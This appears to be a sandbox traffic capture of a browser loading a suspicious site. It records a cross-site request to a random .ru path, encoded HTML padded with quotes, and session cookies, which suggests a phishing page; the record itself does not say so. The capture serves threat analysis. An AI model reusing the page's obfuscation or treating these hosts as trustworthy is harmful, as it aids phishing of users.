LWZhbWlseTogYXJpYWwsIHNhbnMtc2VyaWY7YmFja2dyb3VuZC1jb2xvcjogI2ZmZjtjb2xvcjogIzAwMDtwYWRkaW5nOiAyMHB4O2ZvbnQtc2l6ZTogMThweDtvdmVyc2Nyb2xsLWJlaGF2aW9yOiBjb250YWluOyI+DQo8IS0tIDxkaXY+U3VjY2VzcyBpcyB0aGUgc3VtIG9mIHNtYWxsIGVmZm9ydHMsIHJlcGVhdGVkIGRheSBpbiBhbmQ
2024-07-03 07:40:32 UTC	1369	IN	Data Raw: 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 45 74 4c 53 41 38 5a 47 6c 32 50 6c 4e 31 59 32 4e 6c 63 33 4d 67 61 58 4d 67 62 6d 39 30 49 47 6c 75 49 48 64 6f 59 58 51 67 65 57 39 31 49 47 68 68 64 6d 55 73 49 47 4a 31 64 43 42 33 61 47 38 67 65 57 39 31 49 47 46 79 5a 53 34 38 4c 32 52 70 64 6a 34 67 4c 53 30 2b 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 68 4c 53 30 67 50 47 52 70 64 6a 35 45 62 32 34 6d 49 7a 41 7a 4f 54 74 30 49 47 4a 6c 49 47 46 6d 63 6d 46 70 5a 43 42 30 62 79 42 6e 61 58 5a 6c 49 48 56 77 49 48 52 6f 5a 53 42 6e 62 32 39 6b 49 48 52 76 49 47 64 76 49 47 5a 76 63 69 42 30 61 47 55 67 5a 33 4a 6c 59 58 51 75 50 43 39 6b 61 58 59 2b 49 43 30 74 Data Ascii: jwvZGl2Pg0KPCEtLSA8ZGl2PlN1Y2Nlc3MgaXMgbm90IGluIHdoYXQgeW91IGhhdmUsIGJ1dCB3aG8geW91IGFyZS48L2Rpdj4gLS0+CjwvZm9ybT4NCjwvZGl2Pg0KPC9kaXY+DQo8L2Rpdj4NCjwhLS0gPGRpdj5Eb24mIzAzOTt0IGJlIGFmcmFpZCB0byBnaXZlIHVwIHRoZSBnb29kIHRvIGdvIGZvciB0aGUgZ3JlYXQuPC9kaXY+IC0t
2024-07-03 07:40:32 UTC	529	IN	Data Raw: 5a 53 53 45 52 5a 55 55 64 4c 55 46 64 43 56 30 4e 56 52 30 64 58 56 46 4e 4f 53 6b 64 5a 56 6c 42 57 54 45 6c 44 57 6b 39 43 62 30 77 30 54 32 64 4a 65 47 4a 76 62 55 56 49 64 45 64 34 63 58 56 74 56 6d 78 78 64 58 70 6c 64 32 74 75 5a 47 64 6a 64 33 4e 6b 50 32 6c 79 63 57 46 79 64 6c 6c 4b 52 31 56 54 55 45 46 55 53 6c 5a 59 56 45 31 52 57 46 70 48 55 46 5a 42 56 31 52 54 53 6c 52 5a 52 30 6c 4f 51 30 5a 55 52 6c 64 48 51 30 70 4e 53 46 70 46 55 6b 5a 61 56 46 6c 4a 62 57 56 69 65 57 68 77 62 57 5a 6d 61 48 56 7a 63 32 5a 6b 59 32 31 33 5a 57 74 6a 62 6d 70 79 63 6d 68 6b 63 58 4a 35 62 6d 52 31 59 6e 56 74 64 48 42 33 59 32 67 6e 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 39 44 51 6f 67 49 43 41 67 66 53 6b 37 44 51 70 39 44 51 6f 38 4c 33 4e 6a 63 Data Ascii: ZSSERZUUdLUFdCV0NVR0dXVFNOSkdZVlBWTElDWk9Cb0w0T2dJeGJvbUVIdEd4cXVtVmxxdXpld2tuZGdjd3NkP2lycWFydllKR1VTUEFUSlZYVE1RWFpHUFZBV1RTSlRZR0lOQ0ZURldHQ0pNSFpFUkZaVFlJbWVieWhwbWZmaHVzc2ZkY213ZWtjbmpycmhkcXJ5bmR1YnVtdHB3Y2gnOw0KICAgICAgICB9DQogICAgfSk7DQp9DQo8L3Njc
2024-07-03 07:40:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:32 UTC	1318	OUT	GET /favicon.ico HTTP/1.1 Host: vkwek.ckyucle.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://vkwek.ckyucle.com/2DUx/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: XSRF-TOKEN=eyJpdiI6Ii9RdnVXMlk4Q0pJOFlzbnA2bDRxWXc9PSIsInZhbHVlIjoia0llVG1KMVREc0xvbDVLeVR1Y2wrYTdaNjFmRlY4d2RBSFRacldCbHg4M0x2RWVaTncyMEtlV1JDYnlxejdjbTZUZzBRMmhTWHRpYzhxQlRkK2JkZzJxS1dLMWFRVUg5TEhPa1RBczRwaC9QbU94UFZCN3huU3ordDN3cHFpdWQiLCJtYWMiOiI3MTEwZTM5YzMwMTJmODU5ZWVlYWE3OTJjYWM2ZDkyODU1ZTEwMmJiNjZiNGQxODE4ZTM0YzE4YzczMWM0OGRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjZvOEpGSFdCQnIrMzkrenRNc1dQN3c9PSIsInZhbHVlIjoiTkVFZTNSeUR5c0IwaWxVN0FTOGlORGtXUy9nVWR0NGhLRFpRYnFoTUJlSjhmTGdtR0srUnVSTTdKR3l2QjlxY0Q0N3lHMVpaZFQ0d1l6ZFkxK01mN0tJMnE0eVl5V0daekViWUZOWjJmQ0p5YmZGUmwxTXAwWDRtUUZVUnVwWGwiLCJtYWMiOiI4ODFkOTBjYjRmMWIxOTQxMDI0NWJmZmM2MDFhM2FhZGNjNjI4ODc0NWQwZGNiNDY5ZTRhZGUzOWVhZmVhMjk3IiwidGFnIjoiIn0%3D
2024-07-03 07:40:32 UTC	639	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 07:40:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=14400 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 CF-Cache-Status: HIT Age: 1348 Server: cloudflare CF-RAY: 89d53a5f9edd8c23-EWR
2024-07-03 07:40:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:33 UTC	608	OUT	GET /5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF HTTP/1.1 Host: nzd92.6gniu68.ru Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://vkwek.ckyucle.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://vkwek.ckyucle.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:33 UTC	610	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 07:40:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lZooMoaAqw2GN85zunTjA4DfqtW5%2BCwGsGlbUUpJ9RdsJ7TvBbfme%2BzzKBYWFdEoGIKE%2BodehrD2tGa8OaPBqMPMKl2M49Dq1wav%2Fin%2FgaPe%2BS0e0zDw6WektvKxKj5JRPu3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d53a631c898cc0-EWR alt-svc: h3=":443"; ma=86400
2024-07-03 07:40:33 UTC	6	IN	Data Raw: 31 0d 0a 30 0d 0a Data Ascii: 10
2024-07-03 07:40:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:33 UTC	536	OUT	OPTIONS /report/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://vkwek.ckyucle.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:33 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-type, content-length date: Wed, 03 Jul 2024 07:40:32 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:33 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-07-03 07:40:33 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=116923 Date: Wed, 03 Jul 2024 07:40:33 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:33 UTC	476	OUT	POST /report/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 428 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:33 UTC	428	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 33 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 76 6b 77 65 6b 2e 63 6b 79 75 63 6c 65 2e 63 6f 6d 2f 32 44 55 78 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 Data Ascii: [{"age":3,"body":{"elapsed_time":109,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://vkwek.ckyucle.com/2DUx/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-error","
2024-07-03 07:40:33 UTC	168	IN	HTTP/1.1 200 OK Content-Length: 0 date: Wed, 03 Jul 2024 07:40:33 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:34 UTC	649	OUT	GET /turnstile/v0/api.js?render=explicit HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://vkwek.ckyucle.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:34 UTC	336	IN	HTTP/1.1 302 Found Date: Wed, 03 Jul 2024 07:40:34 GMT Content-Length: 0 Connection: close access-control-allow-origin: * cache-control: max-age=300, public cross-origin-resource-policy: cross-origin location: /turnstile/v0/g/d2a97f6b6ec9/api.js Server: cloudflare CF-RAY: 89d53a69aa7417a5-EWR alt-svc: h3=":443"; ma=86400

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:34 UTC	651	OUT	GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://vkwek.ckyucle.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:34 UTC	959	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 07:40:34 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"61182885-40eb" Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 4062856 Expires: Mon, 23 Jun 2025 07:40:34 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gNnUJ6u7LeXIhVA78p8ArYd67ZWqzpw31Lmzol6Y2gxZt1qlkLrncscD5Kq92eWhdsppqePX%2BYxJCvNGTdtp%2BcIolhmJD6MaDyLn11C4K1G8SHtHX3KdErMNx%2FyAN67owyK0xc2z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 89d53a69bf52195d-EWR alt-svc: h3=":443"; ma=86400
2024-07-03 07:40:34 UTC	410	IN	Data Raw: 33 39 39 38 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b Data Ascii: 3998!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U\|\|function(h){
2024-07-03 07:40:34 UTC	1369	IN	Data Raw: 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 Data Ascii: f globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cre
2024-07-03 07:40:34 UTC	1369	IN	Data Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 Data Ascii: call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes
2024-07-03 07:40:34 UTC	1369	IN	Data Raw: 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 Data Ascii: peof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4o),c=(s=t?h.ceil(s):h.max((0\|s)-this._minBufferSize,0))o,n=h.min(4*c,n);if(c){for(var a=0;a<c
2024-07-03 07:40:34 UTC	1369	IN	Data Raw: 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e Data Ascii: var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b\|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)\|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)\|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)\|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>
2024-07-03 07:40:34 UTC	1369	IN	Data Raw: 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 Data Ascii: for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((nn>>>17)+no>>>15)+oo^((4294901760&i)i\|0)+((65535&i)*i\|0)}t[0]=I[0]+(I[7]<<16\|I[7]>>>16)+(I[6]<<16\|I[6]>>>16)\|0,t[1]=I[1]+(I[0]<<8\|I[0]>>>24)+I[7]\|0,t[2]=I[2]+(I[1]<<16\|I[1]>>>16)+(I[0]<<16\|I[0
2024-07-03 07:40:34 UTC	1369	IN	Data Raw: 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 Data Ascii: r,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]\|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:f
2024-07-03 07:40:34 UTC	1369	IN	Data Raw: 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 Data Ascii: harAt(64);return!o\|\|-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%42,c=r[t.charCodeAt(o)]>>>6-o%42,c=s\|c,i[n>>>2]\|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOP
